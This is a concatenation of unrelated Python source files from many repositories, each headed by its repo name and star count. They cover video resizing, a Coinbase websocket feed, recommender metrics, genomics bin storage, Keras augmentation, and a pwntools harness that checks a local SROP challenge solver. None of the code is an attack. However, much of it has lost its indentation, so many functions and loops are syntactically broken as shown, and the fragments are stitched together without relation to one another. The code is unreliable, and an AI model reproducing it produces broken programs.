abs_dir_path_output = os.path.join(".", "tests", "data", "resize_results")
vd = Video(autoflip_build_path, autoflip_model_path)
# update configuration
app_config.MediaPipe.AutoFlip.set_conf(conf)
try:
vd.resize_video_from_dir(dir_path = dir_path, abs_dir_path_output = abs_dir_path_output, aspect_ratio = aspect_ratio)
except Exception as e:
raise e
print(f"output resized video dir path = {abs_dir_path_output}")
def main_single_video():
    # resize pos_video.mp4 in the same directory, saving it as pos_video_resize.mp4
abs_file_path_output = os.path.join(".", "tests", "data", "pos_video_resize.mp4")
file_path = os.path.join(".", "tests", "data", "pos_video.mp4")
vd = Video(autoflip_build_path, autoflip_model_path)
# update configuration
app_config.MediaPipe.AutoFlip.set_conf(conf)
try:
vd.resize_video(file_path = file_path, abs_file_path_output = abs_file_path_output, aspect_ratio = aspect_ratio)
except Exception as e:
raise e
print(f"output resized video file path = {abs_file_path_output}")
if __name__ == "__main__":
main_single_video()
# uncomment this to run on a folder
# main_folder()
|
script-coinbasepro-webhooks.py | Joel-max-s/pycryptobot | 1,447 | 12690530 | import json, time
from threading import Thread
from websocket import create_connection, WebSocketConnectionClosedException
def main():
ws = None
thread = None
thread_running = False
thread_keepalive = None
def websocket_thread():
global ws
ws = create_connection("wss://ws-feed.pro.coinbase.com")
ws.send(
json.dumps(
{
"type": "subscribe",
"product_ids": ['BTC-USD'],
"channels": ["matches"],
}
)
)
thread_keepalive.start()
while not thread_running:
try:
data = ws.recv()
if data != "":
msg = json.loads(data)
else:
msg = {}
except ValueError as e:
print(e)
print("{} - data: {}".format(e, data))
except Exception as e:
print(e)
print("{} - data: {}".format(e, data))
else:
if "result" not in msg:
print(msg)
try:
if ws:
ws.close()
except WebSocketConnectionClosedException:
pass
finally:
thread_keepalive.join()
def websocket_keepalive(interval=30):
global ws
while ws.connected:
ws.ping("keepalive")
time.sleep(interval)
thread = Thread(target=websocket_thread)
thread_keepalive = Thread(target=websocket_keepalive)
thread.start()
if __name__ == "__main__":
main()
|
finetuning/v2/save-model.py | wietsedv/bertje | 104 | 12690536 | import os
import sys
from transformers import ModelCard, AutoTokenizer, BertForTokenClassification, BertForSequenceClassification, TokenClassificationPipeline, TextClassificationPipeline
if len(sys.argv) < 4:
    print('usage: "python save-model.py basename name type" where "basename" is the original model name ("bert-base-dutch-cased"), "name" is the dir name in "output" and "type" is "token" or "seq"')
exit(1)
base_name = sys.argv[1]
name = sys.argv[2]
typ = sys.argv[3]
if typ not in ['token', 'seq']:
print('type must be token or seq')
exit(1)
src_path = os.path.join('output', name, 'model')
if not os.path.exists(src_path):
print(src_path + ' does not exist')
exit(1)
name = base_name + '-finetuned-' + '-'.join(name.split('-')[:-1])
print(name)
dst_path = f'models/{name}'
os.makedirs(dst_path, exist_ok=True)
# Load model
model = BertForTokenClassification.from_pretrained(
src_path) if typ == 'token' else BertForSequenceClassification.from_pretrained(src_path)
tokenizer = AutoTokenizer.from_pretrained(base_name)
modelcard = ModelCard(model_details="""This model does not have a specific model card yet.
You can possibly find more information about model comparison and labels at [the Github page](https://github.com/wietsedv/bertje).""")
# Save pipeline
pipeline = TokenClassificationPipeline if typ == 'token' else TextClassificationPipeline
pipe = pipeline(model, tokenizer, modelcard=modelcard)
pipe.save_pretrained(dst_path)
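# A reload sketch (assumption: a token-classification model was saved above):
#
#   from transformers import pipeline
#   nlp = pipeline("ner", model=dst_path, tokenizer=dst_path)
#   nlp("Dit is een voorbeeldzin.")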
|
env/Lib/site-packages/OpenGL/GL/ARB/conditional_render_inverted.py | 5gconnectedbike/Navio2 | 210 | 12690539 | '''OpenGL extension ARB.conditional_render_inverted
This module customises the behaviour of the
OpenGL.raw.GL.ARB.conditional_render_inverted to provide a more
Python-friendly API
Overview (from the spec)
This extension adds new modes to BeginConditionalRender which invert
the condition used to determine whether to draw or not.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/ARB/conditional_render_inverted.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.ARB.conditional_render_inverted import *
from OpenGL.raw.GL.ARB.conditional_render_inverted import _EXTENSION_NAME
def glInitConditionalRenderInvertedARB():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION |
ansible/roles/lib_gcloud/build/src/gcloud_compute_zones.py | fahlmant/openshift-tools | 164 | 12690542 | # pylint: skip-file
# pylint: disable=too-many-instance-attributes
class GcloudComputeZones(GcloudCLI):
''' Class to wrap the gcloud compute zones command'''
# pylint allows 5
# pylint: disable=too-many-arguments
def __init__(self, region=None, verbose=False):
''' Constructor for gcloud resource '''
super(GcloudComputeZones, self).__init__()
self._region = region
self.verbose = verbose
@property
def region(self):
'''property for region'''
return self._region
def list_zones(self):
'''return a list of zones'''
results = self._list_zones()
if results['returncode'] == 0 and self.region:
zones = []
for zone in results['results']:
if self.region == zone['region']:
zones.append(zone)
results['results'] = zones
return results
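# Usage sketch (assumes the gcloud CLI is installed and authenticated; field names
# follow the JSON emitted by `gcloud compute zones list --format json`):
#
#   zones = GcloudComputeZones(region='us-central1').list_zones()
#   if zones['returncode'] == 0:
#       print([z['name'] for z in zones['results']])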
|
lenskit/metrics/topn.py | keener101/lkpy | 210 | 12690572 | <reponame>keener101/lkpy<filename>lenskit/metrics/topn.py
"""
Top-N evaluation metrics.
"""
import logging
import numpy as np
import pandas as pd
_log = logging.getLogger(__name__)
def bulk_impl(metric):
def wrap(impl):
metric.bulk_score = impl
return impl
return wrap
def precision(recs, truth, k=None):
"""
Compute recommendation precision. This is computed as:
.. math::
\\frac{|L \\cap I_u^{\\mathrm{test}}|}{|L|}
In the uncommon case that ``k`` is specified and ``len(recs) < k``, this metric uses
``len(recs)`` as the denominator.
"""
if k is not None:
recs = recs.iloc[:k]
nrecs = len(recs)
if nrecs == 0:
return None
ngood = recs['item'].isin(truth.index).sum()
return ngood / nrecs
@bulk_impl(precision)
def _bulk_precision(recs, truth, k=None):
if k is not None:
recs = recs[recs['rank'] <= k]
lcounts = pd.Series(k, index=recs['LKRecID'].unique())
lcounts.index.name = 'LKRecID'
else:
lcounts = recs.groupby(['LKRecID'])['item'].count()
good = recs.join(truth, on=['LKTruthID', 'item'], how='inner')
gcounts = good.groupby(['LKRecID'])['item'].count()
lcounts, gcounts = lcounts.align(gcounts, join='left', fill_value=0)
return gcounts / lcounts
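# Worked example (sketch): a 5-item recommendation list containing 2 relevant items
# has precision 2/5 = 0.4; with k=3 and 1 relevant item in the top 3, precision is 1/3.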
def recall(recs, truth, k=None):
"""
Compute recommendation recall.
"""
nrel = len(truth)
if nrel == 0:
return None
if k is not None:
nrel = min(nrel, k)
recs = recs.iloc[:k]
ngood = recs['item'].isin(truth.index).sum()
return ngood / nrel
@bulk_impl(recall)
def _bulk_recall(recs, truth, k=None):
tcounts = truth.reset_index().groupby('LKTruthID')['item'].count()
if k is not None:
_log.debug('truncating to k for recall')
tcounts = np.minimum(tcounts, k)
recs = recs[recs['rank'] <= k]
good = recs.join(truth, on=['LKTruthID', 'item'], how='inner')
gcounts = good.groupby('LKRecID')['item'].count()
# we need all lists, because some might have no truth (oops), some no recs (also oops)
lists = recs[['LKRecID', 'LKTruthID']].drop_duplicates()
scores = lists.join(gcounts.to_frame('ngood'), on='LKRecID', how='left')
scores['ngood'].fillna(0, inplace=True)
scores = scores.join(tcounts.to_frame('nrel'), on='LKTruthID', how='left')
scores = scores.set_index('LKRecID')
return scores['ngood'] / scores['nrel']
def recip_rank(recs, truth, k=None):
"""
Compute the reciprocal rank of the first relevant item in a list of recommendations.
If no elements are relevant, the reciprocal rank is 0.
This metric has a bulk equivalent.
"""
if k is not None:
recs = recs.iloc[:k]
good = recs['item'].isin(truth.index)
npz, = np.nonzero(good.to_numpy())
if len(npz):
return 1.0 / (npz[0] + 1.0)
else:
return 0.0
@bulk_impl(recip_rank)
def _bulk_rr(recs, truth, k=None):
# find everything with truth
if k is not None:
recs = recs[recs['rank'] <= k]
joined = recs.join(truth, on=['LKTruthID', 'item'], how='inner')
# compute min ranks
ranks = joined.groupby('LKRecID')['rank'].agg('min')
# reciprocal ranks
scores = 1.0 / ranks
_log.debug('have %d scores with MRR %.3f', len(scores), scores.mean())
# fill with zeros
rec_ids = recs['LKRecID'].unique()
scores = scores.reindex(rec_ids, fill_value=0.0)
_log.debug('filled to get %s scores w/ MRR %.3f', len(scores), scores.mean())
# and we're done
return scores
def _dcg(scores, discount=np.log2):
"""
Compute the Discounted Cumulative Gain of a series of recommended items with rating scores.
These should be relevance scores; they can be :math:`{0,1}` for binary relevance data.
This is not a true top-N metric, but is a utility function for other metrics.
Args:
scores(array-like):
The utility scores of a list of recommendations, in recommendation order.
discount(ufunc):
            the rank discount function. Each item's score will be divided by the discount of its rank,
if the discount is greater than 1.
Returns:
double: the DCG of the scored items.
"""
scores = np.nan_to_num(scores)
ranks = np.arange(1, len(scores) + 1)
disc = discount(ranks)
np.maximum(disc, 1, out=disc)
np.reciprocal(disc, out=disc)
return np.dot(scores, disc)
def _fixed_dcg(n, discount=np.log2):
ranks = np.arange(1, n+1)
disc = discount(ranks)
disc = np.maximum(disc, 1)
disc = np.reciprocal(disc)
return np.sum(disc)
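# Worked example (sketch): binary relevance scores [1, 0, 1] with the default log2
# discount give
#   DCG = 1/max(log2 1, 1) + 0/max(log2 2, 1) + 1/max(log2 3, 1)
#       = 1 + 0 + 1/1.585 ≈ 1.63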
def dcg(recs, truth, discount=np.log2):
"""
Compute the **unnormalized** discounted cumulative gain.
    Discounted cumulative gain is computed as:
.. math::
\\begin{align*}
\\mathrm{DCG}(L,u) & = \\sum_{i=1}^{|L|} \\frac{r_{ui}}{d(i)}
\\end{align*}
Args:
recs: The recommendation list.
truth: The user's test data.
discount(ufunc):
            The rank discount function. Each item's score will be divided by the discount of its rank,
if the discount is greater than 1.
"""
tpos = truth.index.get_indexer(recs['item'])
tgood = tpos >= 0
if 'rating' in truth.columns:
# make an array of ratings for this rec list
r_rates = truth['rating'].values[tpos]
r_rates[tpos < 0] = 0
achieved = _dcg(r_rates, discount)
else:
achieved = _dcg(tgood, discount)
return achieved
def ndcg(recs, truth, discount=np.log2, k=None):
"""
Compute the normalized discounted cumulative gain.
Discounted cumultative gain is computed as:
.. math::
\\begin{align*}
\\mathrm{DCG}(L,u) & = \\sum_{i=1}^{|L|} \\frac{r_{ui}}{d(i)}
\\end{align*}
This is then normalized as follows:
.. math::
\\begin{align*}
\\mathrm{nDCG}(L, u) & = \\frac{\\mathrm{DCG}(L,u)}{\\mathrm{DCG}(L_{\\mathrm{ideal}}, u)}
\\end{align*}
Args:
recs: The recommendation list.
truth: The user's test data.
discount(ufunc):
            The rank discount function. Each item's score will be divided by the discount of its rank,
if the discount is greater than 1.
"""
tpos = truth.index.get_indexer(recs['item'])
if k is not None:
recs = recs.iloc[:k]
if 'rating' in truth.columns:
i_rates = np.sort(truth.rating.values)[::-1]
if k is not None:
i_rates = i_rates[:k]
ideal = _dcg(i_rates, discount)
# make an array of ratings for this rec list
r_rates = truth['rating'].values[tpos]
r_rates[tpos < 0] = 0
achieved = _dcg(r_rates, discount)
else:
ntrue = len(truth)
if k is not None and ntrue > k:
ntrue = k
ideal = _fixed_dcg(ntrue, discount)
tgood = tpos >= 0
achieved = _dcg(tgood, discount)
return achieved / ideal
@bulk_impl(ndcg)
def _bulk_ndcg(recs, truth, discount=np.log2, k=None):
if 'rating' not in truth.columns:
truth = truth.assign(rating=np.ones(len(truth), dtype=np.float32))
ideal = truth.groupby(level='LKTruthID')['rating'].rank(method='first', ascending=False)
if k is not None:
ideal = ideal[ideal <= k]
ideal = discount(ideal)
ideal = np.maximum(ideal, 1)
ideal = truth['rating'] / ideal
ideal = ideal.groupby(level='LKTruthID').sum()
ideal.name = 'ideal'
list_ideal = recs[['LKRecID', 'LKTruthID']].drop_duplicates()
list_ideal = list_ideal.join(ideal, on='LKTruthID', how='left')
list_ideal = list_ideal.set_index('LKRecID')
if k is not None:
recs = recs[recs['rank'] <= k]
rated = recs.join(truth, on=['LKTruthID', 'item'], how='inner')
rd = discount(rated['rank'])
rd = np.maximum(rd, 1)
rd = rated['rating'] / rd
rd = rated[['LKRecID']].assign(util=rd)
dcg = rd.groupby(['LKRecID'])['util'].sum().reset_index(name='dcg')
dcg = dcg.set_index('LKRecID')
dcg = dcg.join(list_ideal, how='outer')
dcg['ndcg'] = dcg['dcg'].fillna(0) / dcg['ideal']
return dcg['ndcg']
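# Worked example (sketch): with binary relevance, a list whose two hits sit at ranks 1
# and 3, out of exactly two relevant items, has DCG ≈ 1.63 (see _dcg above) and an
# ideal DCG of _fixed_dcg(2) = 2.0, so nDCG ≈ 0.82.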
|
accounts/admin.py | mirsazzathossain/SPMS-Project | 190 | 12690576 | <reponame>mirsazzathossain/SPMS-Project
from django.contrib import admin
from .models import User
admin.site.register(User)
|
ML/keras/augmentation/augmentation_example.py | saneravi/ML_Stuff | 209 | 12690608 | <gh_stars>100-1000
#!/usr/bin/env python
import matplotlib.pyplot as plt
from keras.datasets import cifar10
from keras.preprocessing.image import ImageDataGenerator
(X_train_raw, y_train_raw), (X_test, y_test) = cifar10.load_data()
n = 10
X_train = X_train_raw[:n] / 255.
y_train = y_train_raw[:n]
da = {}
da['hue_shift'] = 0
da['saturation_scale'] = 0
da['saturation_shift'] = 0
da['value_scale'] = 0
da['value_shift'] = 0
hsv_augmentation = (da['hue_shift'],
da['saturation_scale'],
da['saturation_shift'],
da['value_scale'],
da['value_shift'])
datagen = ImageDataGenerator(
# set input mean to 0 over the dataset
featurewise_center=False,
# set each sample mean to 0
samplewise_center=False,
# divide inputs by std of the dataset
featurewise_std_normalization=False,
# divide each input by its std
samplewise_std_normalization=False,
zca_whitening=False,
# randomly rotate images in the range (degrees, 0 to 180)
rotation_range=0,
# randomly shift images horizontally (fraction of total width)
width_shift_range=0,
# randomly shift images vertically (fraction of total height)
height_shift_range=0,
horizontal_flip=False,
vertical_flip=False,
hsv_augmentation=None,
zoom_range=0,
shear_range=0,
channel_shift_range=0)
generator = datagen.flow(X_train, y_train, batch_size=n, shuffle=False)
batch = next(generator)
fig = plt.figure(figsize=(4, 2))
for i in range(n):
ax = fig.add_subplot(n, 2, 2 * i + 1)
ax.set_axis_off()
ax.imshow(X_train[i]) # non-augmented
ax = fig.add_subplot(n, 2, 2 * i + 2)
ax.set_axis_off()
# batch[0][i] = datagen.standardize(batch[0][i])
ax.imshow(batch[0][i]) # augmented
plt.show()
|
tests/test_diffeq/test_perturbed/test_step/test_perturbedstepsolution.py | mmahsereci/probnum | 226 | 12690611 | import numpy as np
import pytest
from scipy.integrate._ivp import rk
import probnum.problems.zoo.diffeq as diffeq_zoo
from probnum import _randomvariablelist, diffeq
@pytest.fixture
def steprule():
return diffeq.stepsize.AdaptiveSteps(0.1, atol=1e-4, rtol=1e-4)
@pytest.fixture
def perturbed_solution(steprule):
y0 = np.array([0.1, 0.1])
ode = diffeq_zoo.lotkavolterra(t0=0.0, tmax=1.0, y0=y0)
rng = np.random.default_rng(seed=1)
testsolver = diffeq.perturbed.scipy_wrapper.WrappedScipyRungeKutta(
rk.RK45, steprule=steprule
)
sol = diffeq.perturbed.step.PerturbedStepSolver(
rng=rng,
solver=testsolver,
noise_scale=0.1,
perturb_function=diffeq.perturbed.step.perturb_uniform,
)
return sol.solve(ode)
def test_states(perturbed_solution):
assert isinstance(
perturbed_solution.states, _randomvariablelist._RandomVariableList
)
def test_call(perturbed_solution):
"""Test for continuity of the dense output.
Small changes of the locations should come with small changes of the
states.
"""
np.testing.assert_allclose(
perturbed_solution(perturbed_solution.locations[0:]).mean,
perturbed_solution.states[0:].mean,
atol=1e-14,
rtol=1e-14,
)
np.testing.assert_allclose(
perturbed_solution(perturbed_solution.locations[0:-1] + 1e-14).mean,
perturbed_solution(perturbed_solution.locations[0:-1]).mean,
atol=1e-12,
rtol=1e-12,
)
np.testing.assert_allclose(
perturbed_solution(perturbed_solution.locations[1:] - 1e-14).mean,
perturbed_solution(perturbed_solution.locations[1:]).mean,
atol=1e-12,
rtol=1e-12,
)
def test_len(perturbed_solution):
np.testing.assert_allclose(
len(perturbed_solution),
len(perturbed_solution.locations),
atol=1e-14,
rtol=1e-14,
)
def test_getitem(perturbed_solution):
np.testing.assert_allclose(
perturbed_solution.interpolants[1](perturbed_solution.locations[1]),
perturbed_solution[1].mean,
atol=1e-14,
rtol=1e-14,
)
|
examples/docs_snippets_crag/docs_snippets_crag_tests/concepts_tests/partitions_schedules_sensors_tests/test_partitioned_job_test.py | dagster-io/dagster | 4,606 | 12690616 | from docs_snippets_crag.concepts.partitions_schedules_sensors.partitioned_job_test import ( # pylint: disable=unused-import
test_do_stuff_partitioned,
)
|
egg/zoo/simple_autoenc/features.py | vengalraoguttha/EGG | 254 | 12690670 | # Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import os
import pickle
import numpy as np
import torch
import torch.nn.parallel
import torch.utils.data as data
class _OneHotIterator:
"""
>>> it_1 = _OneHotIterator(n_features=128, n_batches_per_epoch=2, batch_size=64, seed=1)
>>> it_2 = _OneHotIterator(n_features=128, n_batches_per_epoch=2, batch_size=64, seed=1)
>>> list(it_1)[0][0].allclose(list(it_2)[0][0])
True
>>> it = _OneHotIterator(n_features=8, n_batches_per_epoch=1, batch_size=4)
>>> data = list(it)
>>> len(data)
1
>>> batch = data[0]
>>> x, y = batch
>>> x.size()
torch.Size([4, 8])
>>> x.sum(dim=1)
tensor([1., 1., 1., 1.])
"""
def __init__(self, n_features, n_batches_per_epoch, batch_size, seed=None):
self.n_batches_per_epoch = n_batches_per_epoch
self.n_features = n_features
self.batch_size = batch_size
self.probs = np.ones(n_features) / n_features
self.batches_generated = 0
self.random_state = np.random.RandomState(seed)
def __iter__(self):
return self
def __next__(self):
if self.batches_generated >= self.n_batches_per_epoch:
raise StopIteration()
batch_data = self.random_state.multinomial(1, self.probs, size=self.batch_size)
self.batches_generated += 1
return torch.from_numpy(batch_data).float(), torch.zeros(1)
class OneHotLoader(torch.utils.data.DataLoader):
"""
>>> data_loader = OneHotLoader(n_features=8, batches_per_epoch=3, batch_size=2, seed=1)
>>> epoch_1 = []
>>> for batch in data_loader:
... epoch_1.append(batch)
>>> [b[0].size() for b in epoch_1]
[torch.Size([2, 8]), torch.Size([2, 8]), torch.Size([2, 8])]
>>> data_loader_other = OneHotLoader(n_features=8, batches_per_epoch=3, batch_size=2)
>>> all_equal = True
>>> for a, b in zip(data_loader, data_loader_other):
... all_equal = all_equal and (a[0] == b[0]).all()
>>> all_equal.item()
0
"""
def __init__(self, n_features, batches_per_epoch, batch_size, seed=None):
self.seed = seed
self.batches_per_epoch = batches_per_epoch
self.n_features = n_features
self.batch_size = batch_size
def __iter__(self):
if self.seed is None:
seed = np.random.randint(0, 2 ** 32)
else:
seed = self.seed
return _OneHotIterator(
n_features=self.n_features,
n_batches_per_epoch=self.batches_per_epoch,
batch_size=self.batch_size,
seed=seed,
)
|
dnanexus/shell/resources/usr/local/lib/python2.7/dist-packages/MACS2/IO/BinKeeper.py | strattan/test-merge2 | 108 | 12690684 | # Time-stamp: <2011-03-14 17:52:00 Tao Liu>
"""Module Description: BinKeeper for Wiggle-like tracks.
Copyright (c) 2008 <NAME> <<EMAIL>>
This code is free software; you can redistribute it and/or modify it
under the terms of the BSD License (see the file COPYING included with
the distribution).
@status: experimental
@version: $Revision$
@author: <NAME>
@contact: <EMAIL>
"""
# ------------------------------------
# python modules
# ------------------------------------
import sys
import re
from bisect import insort,bisect_left,bisect_right,insort_right
from array import array
# ------------------------------------
# constants
# ------------------------------------
# to determine the byte size
if array('H',[1]).itemsize == 2:
BYTE2 = 'H'
else:
raise Exception("BYTE2 type cannot be determined!")
if array('I',[1]).itemsize == 4:
BYTE4 = 'I'
elif array('L',[1]).itemsize == 4:
BYTE4 = 'L'
else:
raise Exception("BYTE4 type cannot be determined!")
if array('f',[1]).itemsize == 4:
FBYTE4 = 'f'
elif array('d',[1]).itemsize == 4:
FBYTE4 = 'd'
else:
raise Exception("BYTE4 type cannot be determined!")
# ------------------------------------
# Misc functions
# ------------------------------------
# ------------------------------------
# Classes
# ------------------------------------
class BinKeeperI:
"""BinKeeper keeps point data from a chromosome in a bin list.
Example:
>>> from taolib.CoreLib.Parser import WiggleIO
>>> w = WiggleIO('sample.wig')
>>> bk = w.build_binKeeper()
>>> bk['chrI'].pp2v(1000,2000) # to extract values in chrI:1000..2000
"""
def __init__ (self,binsize=8000,chromosomesize=1e9):
"""Initializer.
Parameters:
binsize : size of bin in Basepair
chromosomesize : size of chromosome, default is 1G
"""
self.binsize = binsize
self.binnumber = int(chromosomesize/self.binsize)+1
self.cage = []
a = self.cage.append
for i in xrange(self.binnumber):
a([array(BYTE4,[]),array(FBYTE4,[])])
def add ( self, p, value ):
"""Add a position into BinKeeper.
Note: position must be sorted before adding. Otherwise, pp2v
and pp2p will not work.
"""
bin = p/self.binsize
self.cage[bin][0].append(p)
self.cage[bin][1].append(value)
def p2bin (self, p ):
"""Return the bin index for a position.
"""
return p/self.binsize
def p2cage (self, p):
"""Return the bin containing the position.
"""
return self.cage[p/self.binsize]
def __pp2cages (self, p1, p2):
assert p1<=p2
bin1 = self.p2bin(p1)
bin2 = self.p2bin(p2)+1
t = [array(BYTE4,[]),array(FBYTE4,[])]
for i in xrange(bin1,bin2):
t[0].extend(self.cage[i][0])
t[1].extend(self.cage[i][1])
return t
def pp2p (self, p1, p2):
"""Give the position list between two given positions.
Parameters:
p1 : start position
p2 : end position
Return Value:
list of positions between p1 and p2.
"""
(ps,vs) = self.__pp2cages(p1,p2)
p1_in_cages = bisect_left(ps,p1)
p2_in_cages = bisect_right(ps,p2)
return ps[p1_in_cages:p2_in_cages]
def pp2v (self, p1, p2):
"""Give the value list between two given positions.
Parameters:
p1 : start position
p2 : end position
Return Value:
list of values whose positions are between p1 and p2.
"""
(ps,vs) = self.__pp2cages(p1,p2)
p1_in_cages = bisect_left(ps,p1)
p2_in_cages = bisect_right(ps,p2)
return vs[p1_in_cages:p2_in_cages]
def pp2pv (self, p1, p2):
"""Give the (position,value) list between two given positions.
Parameters:
p1 : start position
p2 : end position
Return Value:
list of (position,value) between p1 and p2.
"""
(ps,vs) = self.__pp2cages(p1,p2)
p1_in_cages = bisect_left(ps,p1)
p2_in_cages = bisect_right(ps,p2)
return zip(ps[p1_in_cages:p2_in_cages],vs[p1_in_cages:p2_in_cages])
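# --- Illustrative usage sketch (not part of the original module) ---
# A minimal, hypothetical example of BinKeeperI; the positions and values are
# made up, and positions must be added in sorted order as noted in add():
#
#   bk = BinKeeperI(binsize=8000)
#   for p, v in [(100, 1.0), (1500, 2.5), (9000, 0.5)]:
#       bk.add(p, v)
#   bk.pp2v(0, 2000)    # -> values for positions 100 and 1500
#   bk.pp2pv(0, 10000)  # -> [(100, 1.0), (1500, 2.5), (9000, 0.5)]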
class BinKeeperII:
"""BinKeeperII keeps non-overlapping interval data from a chromosome in a bin list.
This is especially designed for bedGraph type data.
"""
def __init__ (self,binsize=8000,chromosomesize=1e9):
"""Initializer.
Parameters:
binsize : size of bin in Basepair
chromosomesize : size of chromosome, default is 1G
"""
self.binsize = binsize
self.binnumber = int(chromosomesize/self.binsize)+1
self.cage = []
a = self.cage.append
for i in xrange(self.binnumber):
a([array(BYTE4,[]),array(BYTE4,[]),array(FBYTE4,[])])
def add ( self, startp, endp, value ):
"""Add an interval data into BinKeeper.
Note: position must be sorted before adding. Otherwise, pp2v
and pp2p will not work.
"""
startbin = startp/self.binsize
endbin = endp/self.binsize
if startbin == endbin:
# some intervals may only be within a bin
            j = bisect_left(self.cage[startbin][0],startp)
self.cage[startbin][0].insert(j,startp)
self.cage[startbin][1].insert(j,endp)
self.cage[startbin][2].insert(j,value)
else:
# some intervals may cover the end of bins
# first bin
            j = bisect_left(self.cage[startbin][0],startp)
self.cage[startbin][0].insert(j,startp)
self.cage[startbin][1].insert(j,(startbin+1)*self.binsize)
self.cage[startbin][2].insert(j,value)
# other bins fully covered
for i in xrange(startbin+1,endbin):
p = i*self.binsize
                j = bisect_left(self.cage[startbin][0],p)
self.cage[startbin][0].insert(j,p)
self.cage[startbin][1].insert(j,(i+1)*self.binsize)
self.cage[startbin][2].insert(j,value)
insort_right(self.cage[i][0],i*self.binsize)
insort_right(self.cage[i][1],(i+1)*self.binsize)
insort_right(self.cage[i][2],value)
# last bin -- the start of this bin should be covered
insort_right(self.cage[endbin][0],endbin*self.binsize)
insort_right(self.cage[endbin][1],endp)
insort_right(self.cage[endbin][2],value)
def p2bin (self, p ):
"""Given a position, return the bin index for a position.
"""
return p/self.binsize
def p2cage (self, p):
"""Given a position, return the bin containing the position.
"""
return self.cage[p/self.binsize]
def pp2cages (self, p1, p2):
"""Given an interval, return the bins containing this interval.
"""
assert p1<=p2
bin1 = self.p2bin(p1)
bin2 = self.p2bin(p2)
t = [array(BYTE4,[]),array(BYTE4,[]),array(FBYTE4,[])]
for i in xrange(bin1,bin2+1):
t[0].extend(self.cage[i][0])
t[1].extend(self.cage[i][1])
t[2].extend(self.cage[i][2])
return t
def pp2intervals (self, p1, p2):
"""Given an interval, return the intervals list between two given positions.
Parameters:
p1 : start position
p2 : end position
Return Value:
A list of intervals start and end positions (tuple) between p1 and p2.
* Remember, I assume all intervals saved in this BinKeeperII
are not overlapping, so if there is some overlap, this
function will not work as expected.
"""
(startposs,endposs,vs) = self.pp2cages(p1,p2)
p1_in_cages = bisect_left(startposs,p1)
p2_in_cages = bisect_right(endposs,p2)
output_startpos_list = startposs[p1_in_cages:p2_in_cages]
output_endpos_list = endposs[p1_in_cages:p2_in_cages]
# check if the bin (p1_in_cages-1) covers p1
if p1 < endposs[p1_in_cages-1]:
# add this interval
output_startpos_list = array(BYTE4,[p1,])+output_startpos_list
output_endpos_list = array(BYTE4,[endposs[p1_in_cages-1],])+output_endpos_list
# check if the bin (p2_in_cages+1) covers p2
if p2 > startposs[p2_in_cages+1]:
# add this interval
output_startpos_list = array(BYTE4,[startposs[p2_in_cages+1],])+output_startpos_list
output_endpos_list = array(BYTE4,[p2,])+output_endpos_list
return zip(output_startpos_list,output_endpos_list)
def pp2pvs (self, p1, p2):
"""Given an interval, return the values list between two given positions.
Parameters:
p1 : start position
p2 : end position
Return Value:
A list of start, end positions, values (tuple) between p1 and
p2. Each value represents the value in an interval. Remember
the interval length and positions are lost in the output.
* Remember, I assume all intervals saved in this BinKeeperII
are not overlapping, so if there is some overlap, this
function will not work as expected.
"""
(startposs,endposs,vs) = self.pp2cages(p1,p2)
p1_in_cages = bisect_left(startposs,p1)
p2_in_cages = bisect_right(endposs,p2)
output_startpos_list = startposs[p1_in_cages:p2_in_cages]
output_endpos_list = endposs[p1_in_cages:p2_in_cages]
output_value_list = vs[p1_in_cages:p2_in_cages]
# print p1_in_cages,p2_in_cages
# print vs
print output_startpos_list
print output_endpos_list
print output_value_list
# check if the bin (p1_in_cages-1) covers p1
if p1_in_cages-1 >= 0 and p1 < self.cage[p1_in_cages-1][1]:
# add this interval
output_startpos_list = array(BYTE4,[p1,])+output_startpos_list
output_endpos_list = array(BYTE4,[self.cage[p1_in_cages-1][1],])+output_endpos_list
output_value_list = array(BYTE4,[self.cage[p1_in_cages-1][2],])+output_value_list
# check if the bin (p2_in_cages+1) covers p2
#print p2_in_cages+1,len(self.cage)
#print p2, self.cage[p2_in_cages+1][0]
if p2_in_cages+1 < len(self.cage) and p2 > self.cage[p2_in_cages+1][0]:
# add this interval
output_startpos_list = output_startpos_list+array(BYTE4,[self.cage[p2_in_cages+1][0],])
output_endpos_list = output_endpos_list+array(BYTE4,[p2,])
output_value_list = output_value_list+array(BYTE4,[self.cage[p2_in_cages+1][2],])
print output_startpos_list
print output_endpos_list
print output_value_list
return zip(output_startpos_list,output_endpos_list,output_value_list)
|
srop-examples/srop2/harness.py | security-notes/pwntools-write-ups | 456 | 12690693 | #!/usr/bin/env python
from pwn import *
import os, signal
context.log_level = 1000
with tempfile.NamedTemporaryFile() as fd:
s = randoms(12)+"\n"
fd.write(s)
fd.flush()
try:
p = process(["python", "doit.py", "FLAG=%s"%fd.name])
#p.sendline(fd.name)
flagenc = p.recvline(timeout=5).strip()
if flagenc == b64e(s):
print "ok"
else:
print "not ok"
finally:
p.close()
|
zhihu/activity.py | enjoy233/zhihu-py3 | 1,321 | 12690733 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from datetime import datetime
from .acttype import ActType
from .answer import Answer
from .author import Author, ANONYMOUS
from .collection import Collection
from .column import Column
from .common import *
from .post import Post
from .question import Question
from .topic import Topic
class Activity:
"""用户动态类,请使用Author.activities获取."""
def __init__(self, act, session, author):
"""创建用户动态类实例.
:param bs4.element.Tag act: 表示用户动态的页面元素
:param Session session: 使用的网络会话
:param Author author: Activity 所属的用户对象
:return: 用户动态对象
:rtype: Activity
:说明:
根据Activity.type不同可以获取不同属性,具体请看 :class:`.ActType`
"""
self._session = session
self._author = author
self._type = ActType.from_str(act.attrs['data-type-detail'])
useless_tag = act.div.find('a', class_='zg-link')
if useless_tag is not None:
useless_tag.extract()
attribute = self._get_assemble_method(self.type)(act)
self._attr = attribute.__class__.__name__.lower()
setattr(self, self._attr, attribute)
self._time = datetime.fromtimestamp(int(act['data-time']))
@property
def type(self):
"""
:return: 用户动态类型, 具体参见 :class:`.ActType`
:rtype: class:`.ActType`
"""
return self._type
@property
def content(self):
"""获取此对象中能提供的那个属性,对应表请查看 :class:`.ActType` 类.
:return: 对象提供的对象
:rtype: Author or Question or Answer or Topic or Column or Post
"""
return getattr(self, self._attr)
@property
def time(self):
